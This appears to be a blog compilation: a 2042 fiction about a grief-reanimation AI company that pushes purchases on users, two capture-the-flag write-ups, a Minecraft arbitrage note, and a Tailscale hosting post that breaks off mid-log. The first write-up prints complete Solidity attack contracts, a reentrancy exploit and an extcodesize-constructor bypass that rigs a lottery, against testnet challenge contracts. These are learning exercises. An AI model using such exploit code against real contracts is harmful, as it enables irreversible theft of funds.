Editor’s note: to preserve privacy, names have been changed and images are all artificially generated.
July 17, 2042. As Betty Wrightberg gives me a tour of her house, it is clear that she loves her daughter Amy greatly. Pictures of the two in various virtual worlds (a popular experience these days) adorn the house. She even shows me 3D movies of Amy throughout the years.
Amy “departed” in a car accident in 2029, at the age of 17. The images and videos I saw of her are interactive generations by ReturnAI, a reanimation company which shut down in 2039, after financial troubles and a prolonged economic downturn.
Since the early 2020s, generative AI has transformed the way we work. Artists, musicians and writers can churn out masterpieces in seconds, going through hundreds if not thousands of ideas before settling on an output. The rise of generative Hollywood over the last decade has upset long-standing studios such as Marvel as fully generative movies are created every year by AI that deduces what content would resonate the most with various demographics.
One of the most valuable companies to emerge from the generative gold rush was ReturnAI, founded in 2028, which reanimated “departed” loved ones (as the company calls them), bringing them back to life with a combination of state-of-the-art AI models. At first the company provided generated images of the subject, but it quickly expanded to other domains such as video, then took off when it launched its interactive VR models. In a demo I tried in early 2032, it was essentially impossible to distinguish a “returned” (reanimated) person from a real one.
Within a decade, it had gained hundreds of millions of active users, most of whom were using the service every waking minute of their lives. This explosive growth propelled ReturnAI into a multi-billion dollar company.
Betty was an early adopter of the service. While preparing for Amy’s funeral, she realized she didn’t have many high-quality images of her, so she subscribed to the company’s service to generate them. Soon, she upgraded her service to also include audio and video, and has spent thousands of dollars each year on ReturnAI’s services.
Terry Reaper, the CEO of ReturnAI said in a public statement, “We are helping our customers throughout the grieving process. People grieve differently. Some grieve for a few weeks, others may take months or years. We realize that, and want to make the returns as realistic as possible to give dignity to those that are closest to our customer’s hearts. You never need to say goodbye too early.”
A study conducted in 2035 found that over 90% of users were still using the service four years after starting, and tended to spend increasing amounts of money on extra features. The company has come under scrutiny for allegedly using the models of customers’ loved ones to emotionally manipulate them into purchasing add-ons and products, something the company denies, attributing it instead to “emergent” behavior in the AI models.
“This technology is especially addictive to people with less-educated backgrounds, who are increasingly unable to distinguish real and virtual worlds, especially as much of our interaction occurs in the latter.” said one of the authors of the paper, who asked to remain unidentified. “However, a large majority of people that are using this service are experiencing what is known as cognitive dissonance between what they want to believe, and the reality that these are not the people they used to know. It is a lot like living in a dream.”
Betty and Amy on a latent space adventure.
Supporters of the company were vocal as they shared their experiences online. Once they bought in, they say they were able to move on with their lives and even find closure, something that might not have been possible before. But some, like Betty, never really move on.
As I talk with her in her living room, at one point she goes upstairs and comes back with a pile of clothes.
“I didn’t even really want these, but Amy insisted that I get them, she said that it looked good on me, plus they were on discount.”
Looking at the clothes, I can see that they’re from a company called Sensoria, an AI fashion company. It was acquired by ReturnAI in 2034.
“Did Amy ever ask you to buy things?” I asked.
“Of course, but don’t all children? Sometimes I said no, but most of the time I said yes. Here, this is a scan of one of the latent spaces that she wanted me to buy and explore. Here’s a game we had a lot of fun playing together.”
The company also offered an aging add-on, which artificially ages the model over time; thanks to pro-AI government lobbying, AIs were even allowed to enroll in schools.
“Amy liked studying biology. She was so curious about the world, and I wanted her to explore the world and help her learn. I was able to do that and she graduated high school.” she says as I read one of Amy’s essays, or rather, an AI’s imitation of her writing style. The topic is biologically immortal animals: there is a species of jellyfish with a cyclic life cycle; instead of dying, it reverts to the polyp stage and begins life all over again.
“But things are different now—since ReturnAI shut down.” She has a solemn look on her face.
“Would you still use a similar service in the future?” I finally asked, as I was leaving her house.
“I won’t ever lose her again. I won’t.” she said firmly, before shutting the door.
All images were created with Stable Diffusion.
Despite having worked in smart contract security, I have never actually performed an attack before—until now. Let’s take a look at some not-so-smart contracts, shall we?
For our purposes, the Ethereum blockchain is just a distributed system where transactions are recorded and verified cryptographically. Transactions can include Ether (currency) and arbitrary data. By convention, the data conforms to the ABI, which is just a schema. Here are some of the things you can do with transactions that are relevant to this problem.
Ethereum has a stack-based virtual machine (EVM) that executes the code in a smart contract. Usually, the smart contract is written in Solidity then compiled. Solidity is an object oriented, statically-typed language.
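To make “stack-based” concrete, here is a tiny toy interpreter in Python. The opcodes are hypothetical and much simpler than real EVM bytecode, but the execution model is the same: operands are pushed onto a stack and instructions pop their arguments from it.

```python
# Toy stack machine (hypothetical opcodes, not real EVM bytecode).
def run(program):
    stack = []
    for op, *args in program:
        if op == "PUSH":
            stack.append(args[0])
        elif op == "ADD":
            b, a = stack.pop(), stack.pop()
            stack.append(a + b)
        elif op == "MUL":
            b, a = stack.pop(), stack.pop()
            stack.append(a * b)
    return stack[-1]

# (2 + 3) * 10
print(run([("PUSH", 2), ("PUSH", 3), ("ADD",), ("PUSH", 10), ("MUL",)]))  # 50
```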
Now you know enough to make it big in Web3™!
I wrote my first smart contract on Ethereum, deployed onto the Görli testnet, you have got to check it out! To celebrate its launch, I’m giving away free tokens, you just have to redeem your balance. Connect to the server to see the contract address.
Oh boy do I love free tokens!
We are also given a netcat command that upon connection gives the following message:
Hello! The contract is running at 0x7217bd381C35dd9E1B8Fcbd74eaBac4847d936af on the Goerli Testnet.
Here is your token id: 0xdd9ebbfb04777dd38c3c17902d5d6848
Are you ready to receive your flag? (y/n)
And finally, we are given the following smart contract. Right from the start we see that we have two maps from addresses to numbers and one map from addresses to booleans. They track how much balance an account has, how much can be redeemed, and whether the account is valid or not. Note that “account” and “balance” here refer purely to data associated with this contract, not the account and balance on the actual blockchain itself.
There are also three “events”; these are just different types of messages that the contract can “emit” (log) on the blockchain.
contract Nile {
mapping(address => uint256) balance;
mapping(address => uint256) redeemable;
mapping(address => bool) accounts;
event GetFlag(bytes32);
event Redeem(address, uint256);
event Created(address, uint256);
There’s a `createAccount` function that updates the maps corresponding to the originator of the transaction (`msg.sender`), then emits an event showing that an account with a given address has been created.
function createAccount() public {
balance[msg.sender] = 0;
redeemable[msg.sender] = 100;
accounts[msg.sender] = true;
emit Created(msg.sender, 100);
}
Interesting. We can also delete a valid account (our own), clearing the balance and redeemable values to 0.
function deleteAccount() public {
require(accounts[msg.sender]);
balance[msg.sender] = 0;
redeemable[msg.sender] = 0;
accounts[msg.sender] = false;
}
Conveniently, we also have a `getFlag` function, but this only runs to completion if we have enough money.
function getFlag(bytes32 token) public {
require(accounts[msg.sender]);
require(balance[msg.sender] > 1000);
emit GetFlag(token);
}
Ah, right. The contract owner is also giving away free tokens! The `redeem` function checks that the caller has a valid account and is not redeeming more tokens than is redeemable. Then it calls the caller’s fallback function.
function redeem(uint amount) public {
require(accounts[msg.sender]);
require(redeemable[msg.sender] > amount);
(bool status, ) = msg.sender.call("");
if (!status) {
revert();
}
redeemable[msg.sender] -= amount;
balance[msg.sender] += amount;
emit Redeem(msg.sender, amount);
}
}
And this is where the bug is. Since the `redeemable` and `balance` maps get updated after the fallback function is called, we can make the fallback function do another call to `redeem`, and again, and again…
So, what we need to do, in standard terminology, is something called a reentrancy attack. While theoretically simple, it was my first time doing it and I had some unfortunate attempts initially (my frustration will forever be captured on the blockchain).
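Before writing Solidity, it helps to see the bug in miniature. Here is a toy Python model of the contract’s bookkeeping (an illustration only, not EVM semantics): the “external call” is just a callback we control, and it fires before the caller’s state is updated.

```python
# Toy model of the Nile contract's check-call-update ordering.
class Nile:
    def __init__(self):
        self.balance = {}
        self.redeemable = {}
        self.accounts = {}

    def create_account(self, sender):
        self.balance[sender] = 0
        self.redeemable[sender] = 100
        self.accounts[sender] = True

    def delete_account(self, sender):
        assert self.accounts[sender]
        self.balance[sender] = 0
        self.redeemable[sender] = 0
        self.accounts[sender] = False

    def redeem(self, sender, amount, fallback):
        assert self.accounts[sender]
        assert self.redeemable[sender] > amount
        fallback()                        # external call BEFORE the update
        # In Solidity 0.7 this subtraction silently wraps on underflow;
        # in Python it just goes negative, which is enough for the demo.
        self.redeemable[sender] -= amount
        self.balance[sender] += amount

nile = Nile()
ME = "attacker"
n = 0

def fallback():
    # Re-enter redeem() while the outer call's state update is pending.
    global n
    if n < 11:
        n += 1
        nile.delete_account(ME)
        nile.create_account(ME)
        nile.redeem(ME, 99, fallback)

nile.create_account(ME)
nile.redeem(ME, 99, fallback)
print(nile.balance[ME])  # 1188, comfortably above the 1000 threshold
```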
To set it up we have to write another contract that will serve as the attack, this is what I wrote:
pragma solidity ^0.7.6;
import "./Nile.sol";
contract Attack {
Nile nile;
uint256 internal n = 0;
event Fallback(address caller, string message);
constructor(address _nile) {
nile = Nile(_nile);
}
function attack() public {
nile.createAccount();
nile.redeem(99);
}
function getFlag(bytes32 token) public {
nile.getFlag(token);
}
fallback() external payable {
if (n < 11) {
emit Fallback(msg.sender, "Fallback was called");
n += 1;
nile.deleteAccount();
nile.createAccount();
nile.redeem(99);
} else {
emit Fallback(msg.sender, "Fallback has ended");
}
}
}
A few things to note. There are two variables, `nile` and `n`. `nile` points to the deployment of the vulnerable contract, and `n` records how many times the reentrancy was performed. To perform the attack we call `attack`, which creates the account and redeems 99 tokens. Now, since `redeem` calls the fallback function of the caller, we get to run the code in the `fallback()` method.

In the `fallback()` method we update the counter, delete the account, create a new one and redeem another 99 tokens. This works because the state in the target contract actually hasn’t been updated yet, so we can just keep creating accounts and redeeming tokens.
This series of transactions is proof that I was able to get the flag. That’s the magic of blockchain, you can prove a heist happened!
Sometimes the house wins. Sometimes you both win. Note: the token must be right-padded to 64 bytes if using Remix and passing as a function parameter.
Bah, this smart contract is kind of long. Let’s take it piece by piece.
There’s a map of `designators` and one of `balances`, a special address called the `selector`, a private variable `nextVal`, and an 8-by-8 array of `bids`.
contract Andes {
// designators can designate an address to be the next random
// number selector
mapping (address => bool) designators;
mapping (address => uint) balances;
address selector;
uint8 private nextVal;
address[8][8] bids;
event Registered(address, uint);
event RoundFinished(address);
event GetFlag(bytes32);
There are some pretty normal-looking functions that show how designators can be changed. Only designators can set the next selector, and only the selector can set the value of `nextVal`.
modifier onlyDesignators() {
require(designators[msg.sender] == true, "Not owner");
_;
}
function setNextSelector(address _selector) public onlyDesignators {
require(_selector != msg.sender);
selector = _selector;
}
function setNextNumber(uint8 value) public {
require(selector == msg.sender);
nextVal = value;
}
This time, we have a constructor, which sets the sender of the transaction to be a designator and resets the bids.
constructor(){
designators[msg.sender] = true;
_resetBids();
}
function _resetBids() private {
for (uint i = 0; i < 8; i++) {
for (uint j = 0; j < 8; j++) {
bids[i][j] = address(0);
}
}
}
function getBalance() public view returns(uint) {
return balances[msg.sender];
}
The `register` function sets the balance of the sender to 50, but only if it is currently less than 10, and a specific bid can be purchased if the balance of the sender is more than 10.
function register() public {
require(balances[msg.sender] < 10);
balances[msg.sender] = 50;
emit Registered(msg.sender, 50);
}
function purchaseBid(uint8 bid) public {
require(balances[msg.sender] > 10);
require(msg.sender != selector);
uint row = bid % 8;
uint col = bid / 8;
if (bids[row][col] == address(0)) {
balances[msg.sender] -= 10;
bids[row][col] = msg.sender;
}
}
So once we have these bids, what can we do with them? Designators can start a new round, and the winner is determined by `nextVal`. The lucky winner gets 1000 points, which is enough to get the flag.
function playRound() public onlyDesignators {
address winner = bids[nextVal % 8][nextVal / 8];
balances[winner] += 1000;
_resetBids();
emit RoundFinished(winner);
}
function getFlag(bytes32 token) public {
require(balances[msg.sender] >= 1000);
emit GetFlag(token);
}
Finally, there are two functions which let us designate a new owner, but only if the sender satisfies the predicate `_canBeDesignator`. The purpose of that predicate is to determine whether an address is an ordinary account or a contract.
function designateOwner() public {
require(_canBeDesignator(msg.sender));
require(balances[msg.sender] > 0);
designators[msg.sender] = true;
}
function _canBeDesignator(address _addr) private view returns(bool) {
uint size = 0;
assembly {
size := extcodesize(_addr)
}
return size == 0 && tx.origin != msg.sender;
}
}
It is in `_canBeDesignator` that the vulnerability lies. In the EVM, `extcodesize` is an opcode that returns the size of the code stored at an address. However, using `extcodesize` as a contract check is not reliable: while a contract’s constructor is running, its code has not yet been stored on-chain, so `extcodesize` returns 0.
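The constructor loophole can be modeled in a few lines of Python. This is a sketch, not EVM semantics: deployment here simply stores the runtime code only after the constructor has finished running, which is the property the attack exploits.

```python
# Toy model: code size is zero while a constructor is still running.
class Chain:
    def __init__(self):
        self.code = {}                 # address -> deployed bytecode

    def extcodesize(self, addr):
        return len(self.code.get(addr, b""))

    def deploy(self, addr, constructor, runtime):
        constructor(self, addr)        # runs while code[addr] is absent
        self.code[addr] = runtime      # stored only after construction

chain = Chain()
seen = []

def ctor(ch, addr):
    # From inside the constructor, the contract looks like a plain account.
    seen.append(ch.extcodesize(addr))

chain.deploy("0xATTACK", ctor, b"\x60\x00")
print(seen[0], chain.extcodesize("0xATTACK"))  # 0 2
```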
This is what we have so far:
So to launch the attack, we’re going to need something a little more sophisticated: two contracts, `Bidder` and `Designator`. `Bidder`’s constructor registers, purchases the bid at index 0, and makes itself a designator (using the `extcodesize` trick). `Designator`’s constructor launches the whole attack: it registers, becomes a designator the same way, and calls `Bidder` to set `Designator` as the next selector. Now that `Designator` is both a designator and the selector, it can set the next number to 0 and play a round. Then, naturally, `Bidder` wins the round, and we can get the flag!
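The whole choreography can be checked with a toy Python bookkeeping model of the contract. This is an illustration only: the `extcodesize` check is omitted, since the constructor trick bypasses it anyway, and addresses are just strings.

```python
# Toy bookkeeping model of the Andes attack sequence.
class AndesModel:
    def __init__(self, deployer):
        self.designators = {deployer: True}
        self.balances = {}
        self.selector = None
        self.next_val = 0
        self.bids = [[None] * 8 for _ in range(8)]

    def register(self, sender):
        assert self.balances.get(sender, 0) < 10
        self.balances[sender] = 50

    def purchase_bid(self, sender, bid):
        assert self.balances[sender] > 10 and sender != self.selector
        row, col = bid % 8, bid // 8
        if self.bids[row][col] is None:
            self.balances[sender] -= 10
            self.bids[row][col] = sender

    def designate_owner(self, sender):
        assert self.balances[sender] > 0   # extcodesize check skipped here
        self.designators[sender] = True

    def set_next_selector(self, sender, sel):
        assert self.designators.get(sender) and sel != sender
        self.selector = sel

    def set_next_number(self, sender, value):
        assert sender == self.selector
        self.next_val = value

    def play_round(self, sender):
        assert self.designators.get(sender)
        winner = self.bids[self.next_val % 8][self.next_val // 8]
        self.balances[winner] = self.balances.get(winner, 0) + 1000
        self.bids = [[None] * 8 for _ in range(8)]

andes = AndesModel("deployer")
# Bidder's constructor: register, buy bid 0, become a designator.
andes.register("Bidder")
andes.purchase_bid("Bidder", 0)
andes.designate_owner("Bidder")
# Designator's constructor: register, become a designator, get selected.
andes.register("Designator")
andes.designate_owner("Designator")
andes.set_next_selector("Bidder", "Designator")
andes.set_next_number("Designator", 0)
andes.play_round("Designator")
print(andes.balances["Bidder"])  # 1040, enough to call getFlag
```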
The contracts are really quite simple, and I just performed some steps interactively. Once again, here’s proof that we got the flag.
pragma solidity ^0.7.6;
import "./andes.sol";
// Makes bid
contract Bidder {
Andes andes;
bytes32 token;
event MyBalanceIs(address caller, string message, uint b);
constructor(address _andes) {
andes = Andes(_andes);
andes.register();
andes.purchaseBid(0);
andes.designateOwner();
}
function designate(address other) public {
andes.setNextSelector(other);
}
function setToken(bytes32 _token) public {
token = _token;
}
function getFlag() public {
andes.getFlag(token);
}
function getBalance() public {
uint b = andes.getBalance();
emit MyBalanceIs(msg.sender, "Balance got", b);
}
}
// Sets next number
contract Designator {
constructor(address _andes, address _attack, bytes32 token) {
// andes is the contract they deploy
Andes andes = Andes(_andes);
// attack is the contract we deploy, and we buy bid 0 and they're also owner
Bidder attack = Bidder(_attack);
attack.setToken(token);
// register ourselves
andes.register();
// make ourselves owner
andes.designateOwner();
// tell the attack contract to make us designator, and make us selector
attack.designate(address(this));
andes.setNextNumber(0);
// start the round
andes.playRound();
}
}
These two challenges really illustrate the notion that smart contracts are not inherently more or less secure than other technology. Security is not just a technical problem but also a social process. Without the right coding practices and review processes, bugs can slip through and lead to disaster. The stakes are higher in blockchain because there is no reverting stolen funds, as dramatically demonstrated by recent market turmoil. Thanks for reading!
Views expressed here are of my own and not of any employer, former, present or future.
Note: after essentially exercising all the arbitrage that was possible, a week later prices converged and it was much harder to do.
What’s the price of a block of cobblestone? What about the price of gold? There are some heuristics that can help determine pricing; for instance, iron blocks consist of 9 iron ingots, so any price discrepancy would quickly be ironed out by arbitrage. Diamonds feel like they should be pricey, but it’s unclear what would constitute a “fair” price. Fortunately, economics has the answer to this: let the market decide!
Several Minecraft servers have a buy/sell plugin in which a shopkeeper can stock up a chest with a desired item and set it to buy or sell the item. Some shops even have buy and sell chests for the same item. Of course, no one would be naïve enough to allow arbitrage to be exercised against themselves, so the spreads I observed were always ridiculous, and rightly so. If I don’t really need much of an item, why would I buy it at a high price from people and risk bankruptcy?
But there is no limit to how many stores can be opened and how things are priced. This is where arbitrage comes in. To make matters easier, there are no transaction fees, and the transactions happen instantly. There was also a warp system that conveniently allowed me to teleport to any market that people advertised on a list.
The game, then, was straightforward. Go around collecting buy/sell information from various shops, just as in real markets, observe where a buy price is higher than a sell price, then do the trade.
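The scan described above is simple enough to sketch in a few lines of Python. The shop quotes here are illustrative, not real server data; a “sell” quote is the price the shop sells to me at, and a “buy” quote the price it pays me.

```python
# Sketch of the arbitrage scan: find items where some shop's buy price
# exceeds another shop's sell price. Quotes are made-up illustrations.
quotes = [
    # (item, shop, side, unit_price)
    ("gunpowder", "spawners and more", "sell", 10),
    ("gunpowder", "killashop", "buy", 15),
    ("oak log", "stellvia", "sell", 4),
    ("oak log", "iced logs", "buy", 3),
]

def find_arbitrage(quotes):
    opportunities = []
    for item in {q[0] for q in quotes}:
        sells = [q for q in quotes if q[0] == item and q[2] == "sell"]
        buys = [q for q in quotes if q[0] == item and q[2] == "buy"]
        for s in sells:
            for b in buys:
                if b[3] > s[3]:   # buy price higher than sell price
                    opportunities.append(
                        (item, s[1], s[3], b[1], b[3], b[3] - s[3]))
    return opportunities

for opp in find_arbitrage(quotes):
    print(opp)  # gunpowder: buy at 10, sell at 15, profit 5 per unit
```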
Here’s a graph showing the net profits after 117 trades.
For completeness, this is how the transactions looked when I recorded them. The only unfortunate thing is that from time to time I bankrupted some users (RIP iced logs).
| item | shop | quantity | price | amt | net profit |
|---|---|---|---|---|---|
| gunpowder | spawners and more | 15 | -10 | -150 | 12551.2 |
| gunpowder | killashop | 15 | 15 | 225 | 12776.2 |
| oak log | stellvia | 114 | -4 | -456 | 12320.2 |
| oak planks | iced logs | 456 | 2 | 912 | 13232.2 |
| birch log | stellvia | 432 | -4 | -1728 | 11504.2 |
| birch planks | iced logs | 1728 | 2 | 3456 | 14960.2 |
| spruce planks | celt | 1472 | -1 | -1472 | 13488.2 |
| spruce planks | iced logs (bankrupted) | 162 | 2 | 324 | 13812.2 |
It was also interesting to observe market changes in real time. In one particular instance, gunpowder was being sold by the hundreds from a shop pricing it at $5 each, clearly a steal given that another shop was happily buying it at $15. As I kept buying the shop out of gunpowder and messaging the shopkeeper, I watched the price rise to $7.50, then $10. That’s price convergence right there.
Some thought experiments that I did not implement but might serve as suggestions for the interested reader:
This past weekend I had a lot of fun participating in SekaiCTF 2022. This post dives into a particular problem our team found interesting and was quick to solve: ours was the 5th of 12 eventual solves, out of the 800+ teams that participated.
As the name implies, Matryoshka (матрёшка) refers to Russian nesting dolls. In the context of CTFs, this probably was hinting at the multi-layered nature of the problem, an appreciated nudge since we are pressed for time during competitions.
We were given two PNG files and the following bullet points.
| Matryoshka.png | Matryoshka-Lite.png |
|---|---|
This proved intriguing, since the screenshots appeared to show all that was necessary—the code, example run and what potentially could be the flag or next step. We see what appears to be VS Code windows with a dark, high-contrast theme on, Python code and colored text in a terminal, presumably generated from the same code.
The first bullet point refers to the fact that adding another bit to a string doubles the number of possible messages that can be conveyed. In this case, terminal backgrounds offer 8 standard colors and 16 including the bright variants, which can encode 3 and 4 bits respectively.
The second bullet point I recognized as a possible reference to a phenomenon I saw on Hacker News 9 months ago, where the way that Apple software implemented PNG parsing had a race condition that could be exploited to cause PNG images to render differently than they would on other platforms. Though, no signs of that quite yet.
This resource was very helpful while brushing up on the ever-so-niche ANSI escape codes that have cryptic syntax.
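For a quick feel of the codes involved: SGR codes 40–47 select the normal background colors and 100–107 the bright ones, which together cover exactly one nibble (3 bits of color plus 1 brightness bit). A one-liner to print them all in a color-capable terminal:

```python
# Print the 16 background colors (SGR 40-47 and 100-107) used to encode
# each 4-bit nibble. \033[...m sets the style; \033[0m resets it.
def color_rows():
    rows = []
    for base in (40, 100):
        rows.append("".join(
            f"\033[{base + i}m {base + i} \033[0m" for i in range(8)))
    return rows

for row in color_rows():
    print(row)
```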
Of course, I immediately transcribed the code, changed VS Code’s color settings and replicated the output. I chose to stick with the `Matryoshka-Lite` image because no foreground color was being set, so I would only have to sample one color per cell, and I changed the smiley face to a dot.
import sys
stdin = sys.stdin.buffer.read()
d = "".join(bin(i)[2:].zfill(8) for i in stdin)
p = ""
for i in range(0, len(d), 8):
l = d[i:i+4]
h = d[i+4:i+8]
he = 40 if h[0] == "0" else 100
he += int(h[1:], 2)
le = 40 if l[0] == "0" else 100
le += int(l[1:], 2)
p += f"\033[{he}m●\033[0m"
p += f"\033[{le}m●\033[0m"
print(p)
The Japanese sentence あなたと私でランデブー？ (You and me, rendezvous?) also provided a sanity check that the code was executing correctly. Being somewhat of a hobby linguist, I noticed immediately that the character ？ was the FULLWIDTH QUESTION MARK character used in East Asian languages. This was important in making sure that the outputs matched exactly.
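The distinction is easy to verify from Python’s Unicode database; the fullwidth character is U+FF1F, while the ASCII one is U+003F:

```python
import unicodedata

# The two question marks are distinct codepoints with distinct names.
print(unicodedata.name("？"))          # FULLWIDTH QUESTION MARK
print(hex(ord("？")), hex(ord("?")))   # 0xff1f 0x3f
```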
Cryptography-wise, this was a relief. It’s immediately evident that this is a mere block cipher. To walk through an example, consider what happens when we start with the string `fl`. First we convert the scalar values (not bytes!) into binary numbers and left-pad them with zeroes.
>>> [bin(i)[2:].zfill(8) for i in "fl".encode()]
['01100110', '01101100']
Next we join the strings, then repeatedly take blocks `l` and `h` of size 4. We check whether the first digit is a 0 or a 1 and accordingly add the remaining bits to either 40 or 100. Observe that since the maximum value of the remaining bits is 7, we can easily reverse the process to go back to the original block. Adjacent blocks are also transposed as we go along, which was a bit unusual but did not affect the reversing process. This is the algorithm I wrote:
# inverse of encode
def decode(d):
# reconstruct the first bit
if d >= 100:
d -= 100
b = "1"
else:
d -= 40
b = "0"
# reconstruct the last 3 bits then concat
return b + bin(d)[2:].zfill(3)
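A quick round-trip check gives confidence in `decode`. The `encode_nibble` helper below is mine, written to mirror the challenge’s encoding (each 4-bit nibble becomes 40+bits or 100+bits depending on its leading bit); `decode` is copied from above.

```python
# Round-trip sanity check: encode every 4-bit nibble, then decode it.
def encode_nibble(bits):                # bits: 4-char binary string
    base = 100 if bits[0] == "1" else 40
    return base + int(bits[1:], 2)

def decode(d):                          # inverse, as in the writeup
    if d >= 100:
        d -= 100
        b = "1"
    else:
        d -= 40
        b = "0"
    return b + bin(d)[2:].zfill(3)

for n in range(16):
    bits = bin(n)[2:].zfill(4)
    assert decode(encode_nibble(bits)) == bits
print("all 16 nibbles round-trip")
```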
Now that I had the algorithm to decrypt the cipher, I looked at the image and had to decide how to turn the colors shown into the array of numbers to decode. Since CTFs are time-sensitive, I literally just used macOS’s Color Picker utility and keyboard shortcuts to go through the colored rectangles one by one and paste them into Emacs. It would be disastrous to miss or repeat a color, so I found some Emacs Lisp code that would highlight the hex colors in `text-mode` buffers for ease of viewing.
So now we have a list of hex colors. Then, a bit of Emacs-fu and visual cross-checks allowed me to obtain the list of numbers.
enc = []
with open("data.txt") as f:
for line in f:
enc += [int(line)]
w = []
for i in range(0, len(enc), 2):
w += [chr(int(decode(enc[i+1]) + decode(enc[i]),2))]
print("".join(w))
Decoding becomes a piece of cake. We obtain the URL `https://matryoshka.sekai.team/-qLf-Aoaur8ZVqK4aFngYg.png`, which is the following image:
I encourage you to scan the QR code. Things were looking a bit duller at this point. What’s with the noisy lines across the image? We spent a few minutes trying to collect the lines together and discern patterns in it, but no dice.
Then I remembered the clue from earlier. Unfortunately (or fortunately), my macOS version is far too new to have the bug, and several teammates were using Windows laptops. However, Nisala hadn’t updated his Mac in a while, and we were pleasantly surprised when we saw Safari correctly incorrectly rendering the PNG:
Bingo. Now when we scan the QR code, instead of a funny YouTube video we have this string:
shc:/567629595326546034602925407728043360287028656767542228092862372537602870286471674522280928634574526211034024670434233765554071054127456939042926406255064004596454042805366275405364596240252505550563385660291201064133334000287426350769397345520569365831710645587511315563532037543725750333282007056438385529347431395000095360613569313469556437095271051156656000056021722344673745420858072224753471320344243952613730560044440024000852373530612220274531676726270826302907692353757111351141274011042125405375255563037425335071365032556535632641544339702054361000507435221163067523316357757411564336545855031076266842546862084037546344702737680561713276076561257127255232346110053611210303083338675831665367256437674252706463232700030056237008602266592034052523577620436633263622092572334422256310737575584243581210582212212471750650672754263640582934542211332367712050772552114411317523630466042261750312567306544431725275220707262320265324343011283753722556680004006276676760553231602250366220411058582552226929223342595966242763774467452611735825454120271028616665383630532462557156227734536075072844047204076307330056237036414328004270110664293577225253657400102572645765577655695571355362282733317237286230595743326029643350585261770703750957355631595529303366642407276039591054330445753933345035675439585429290653321266452309103133346727223912084224382764344412367756556509582677434371103943524557602103546553215963315334635223584440586364423368666708453055686937216622696354734342277154113025076461657663410724693942210726712368683927550644365861597541237542105521700938095245553377003136547030406731064375763440090876116763265352745674214230237068117443117752204070054540323104403465546166205521300661536667385336672264352767554222403500731036397639044057050055552443713010107306414357567640576467552860063962716423770675695777435766690541641105616445350968432577626734322729766865427374043540770108323560036562266345354559713266607565062203596058680773530560523474364045273972586568315538046
24139525240420467593362371139026720436433630272626572681040385977300452644174
Scanning it with my iPhone I saw that it was a COVID-19 vaccination record, but nothing really seemed out of the ordinary. Then Akash found a Smart Health Card parser where we pasted in the raw contents.
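The numeric payload itself is easy to unwrap by hand: per the SMART Health Cards spec, each pair of digits, plus 45, gives one ASCII character of a JWS. A small sketch (the helper name is mine):

```python
# Unwrap an "shc:/" numeric payload into JWS text: each digit pair + 45
# is an ASCII code. Shown on the first few digits of the QR above.
def shc_to_jws(numeric):
    digits = numeric.removeprefix("shc:/")
    return "".join(
        chr(int(digits[i:i + 2]) + 45) for i in range(0, len(digits), 2))

print(shc_to_jws("shc:/5676295953265460"))  # eyJhbGci -> a JWS header
```

The `eyJ...` prefix is the telltale base64 of `{"`, confirming we are looking at a JSON Web Signature.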
We spotted an unusual entry in the contact information for the patient—a base64 encoded string.
...
contact: [
{
name: {
text: "flag"
},
telecom: [
{
system: "url",
value: "data:text/html;base64,PGF1ZGlvIHNyYz0iaHR0cHM6Ly9tYXRyeW9zaGthLnNla2FpLnRlYW0vOGQ3ODk0MTRhN2M1OGI1ZjU4N2Y4YTA1MGI4ZDc4OGUud2F2IiBjb250cm9scz4="
}
]
}
]
...
Onto the next stage!
Let’s decode the base64.
$ echo 'PGF1ZGlvIHNyYz0iaHR0cHM6Ly9tYXRyeW9zaGthLnNla2FpLnRlYW0vOGQ3ODk0MTRhN2M1OGI1ZjU4N2Y4YTA1MGI4ZDc4OGUud2F2IiBjb250cm9scz4=' | base64 -d
<audio src="https://matryoshka.sekai.team/8d789414a7c58b5f587f8a050b8d788e.wav" controls>
Hm, an audio file (warning: loud noise). This was the most experimental of all the stages. At first it seemed like just noise but on closer listening we could faintly hear a human voice speak in regular intervals. It doesn’t show up on a spectrogram however:
By now half of our team was listening to parts of the audio file and messing around with various audio settings such as equalization and noise reduction. To be clear, none of us are audio engineers by training so this was a do-what-feels-right kind of deal. Eventually, we found a website that did noise reduction and put the audio file through it 5 times, then, to our continual surprise (which was routine at this point), this is what we saw and heard:
Now the words were very clear. They corresponded to the NATO phonetic alphabet, and it was now far easier to transcribe the message, which was the flag: `SEKAI{KandoRyoko5Five2Two4Four}`.
The question was really well-designed, and was a refreshing format to see in a CTF competition which is often dominated by more traditional reverse engineering. I do want to highlight some things I thought were great to see:
I hope you enjoyed reading this post as much as I enjoyed the process of working with my teammates and finding the flag!
I want to play Minecraft with my friends, and I already have a server exposed to the internet. However, my server is severely underpowered and is unable to run a Minecraft server instance. On the other hand, I have a spare beefy laptop that can easily handle the load, but port-forwarding is not possible. Both the server and the laptop are on my Tailscale network. Could I somehow leverage all of this to spin up a Minecraft server with a public IP? The answer was yes—and I was surprised at how easy it all was. As a plus, the server is very playable and the latency was better than trying out random “free hosting” services.
I already use Tailscale on all my devices, so of course when I spin up a Minecraft server instance on one device I can immediately connect to it from my other ones. My friends do not have Tailscale (yet!), so unfortunately node sharing is out of the picture for now, but I can still take advantage of Tailscale in that my laptop will always have a static IP relative to the server, and the server will always have a static IP relative to the public internet. So altogether the connection will be deterministic and I don’t have to resort to any dynamic shenanigans.
Let’s test the hypothesis.
$ NIXPKGS_ALLOW_UNFREE=1 nix run --impure nixpkgs#minecraft-server
Starting net.minecraft.server.Main
[22:18:53] [ServerMain/INFO]: Building unoptimized datafixer
[22:18:54] [ServerMain/INFO]: Environment: authHost='https://authserver.mojang.com', accountsHost='https://api.mojang.com', sessionHost='https://sessionserver.mojang.com', servicesHost='https://api.minecraftservices.com', name='PROD'
[22:18:54] [ServerMain/INFO]: Loaded 7 recipes
[22:18:55] [ServerMain/INFO]: Loaded 1179 advancements
[22:18:55] [Server thread/INFO]: Starting minecraft server version 1.19.1
[22:18:55] [Server thread/INFO]: Loading properties
[22:18:55] [Server thread/INFO]: Default game type: SURVIVAL
[22:18:55] [Server thread/INFO]: Generating keypair
[22:18:55] [Server thread/INFO]: Starting Minecraft server on *:25565
[22:18:55] [Server thread/INFO]: Using default channel type
[22:18:55] [Server thread/INFO]: Preparing level "world"
[22:18:55] [Server thread/INFO]: Preparing start region for dimension minecraft:overworld
[22:18:56] [Worker-Main-1/INFO]: Preparing spawn area: 0%
[22:18:56] [Worker-Main-1/INFO]: Preparing spawn area: 0%
[22:18:56] [Worker-Main-7/INFO]: Preparing spawn area: 0%
[22:18:57] [Worker-Main-7/INFO]: Preparing spawn area: 0%
[22:18:57] [Worker-Main-1/INFO]: Preparing spawn area: 83%
